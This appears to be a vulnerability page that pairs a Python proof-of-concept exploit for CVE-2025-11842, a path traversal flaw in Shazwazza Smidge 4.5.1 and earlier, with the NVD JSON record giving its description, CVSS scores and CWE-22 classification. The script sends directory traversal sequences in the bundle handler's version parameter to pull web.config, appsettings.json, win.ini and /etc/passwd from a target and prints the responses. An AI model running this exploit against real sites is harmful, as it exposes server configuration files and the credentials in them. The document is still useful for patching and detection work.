CVE-2025-11842

# CVE-2025-11842 - Shazwazza Smidge Path Traversal PoC # Affected: Shazwazza Smidge <= 4.5.1 # Component: Bundle Handler # Vulnerable Parameter: Version import requests # Target configuration TARGET_URL = "http://target-site.com" BUNDLE_HANDLER_PATH = "/Smidge/Bundle" # Default Smidge bundle handler path def exploit_path_traversal(target_url, traversal_path): """ Exploit path traversal via the Version parameter in Smidge Bundle Handler. The Version parameter is not properly sanitized, allowing directory traversal. """ # Construct malicious Version parameter with path traversal sequence malicious_version = f"../../../../../../../../{traversal_path}" # Build the request URL exploit_url = f"{target_url}{BUNDLE_HANDLER_PATH}" # Parameters that trigger the vulnerable code path params = { "v": malicious_version, # Version parameter "t": "css", # Type: css or js "bundleName": "default" # Bundle name } headers = { "User-Agent": "Mozilla/5.0", "Accept": "*/*" } try: response = requests.get(exploit_url, params=params, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") print(f"[*] Response Body:\n{response.text[:2000]}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": # Attempt to read sensitive files via path traversal target_files = [ "web.config", "appsettings.json", "../web.config", "../../web.config", "../../../web.config", "windows/win.ini", "etc/passwd" ] print("[*] CVE-2025-11842 - Smidge Path Traversal Exploit") print("[*] Targeting Bundle Handler Version parameter\n") for target_file in target_files: print(f"\n[+] Attempting to read: {target_file}") result = exploit_path_traversal(TARGET_URL, target_file) if result and result.status_code == 200: print(f"[+] SUCCESS: File may have been retrieved!") break

{"cve": {"id": "CVE-2025-11842", "sourceIdentifier": "[email protected]", "published": "2025-10-16T16:15:37.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Shazwazza Smidge up to 4.5.1. The impacted element is an unknown function of the component Bundle Handler. The manipulation of the argument Version leads to path traversal. Remote exploitation of the attack is possible. Upgrading to version 4.6.0 is sufficient to resolve this issue. It is recommended to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Shazwazza/Smidge/releases/tag/v4.6.0", "source": "[email protected]"}, {"url": "https://github.com/asust9/smidge-vuln?tab=readme-ov-file", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.328776", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.328776", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664905", "source": "[email protected]"}]}}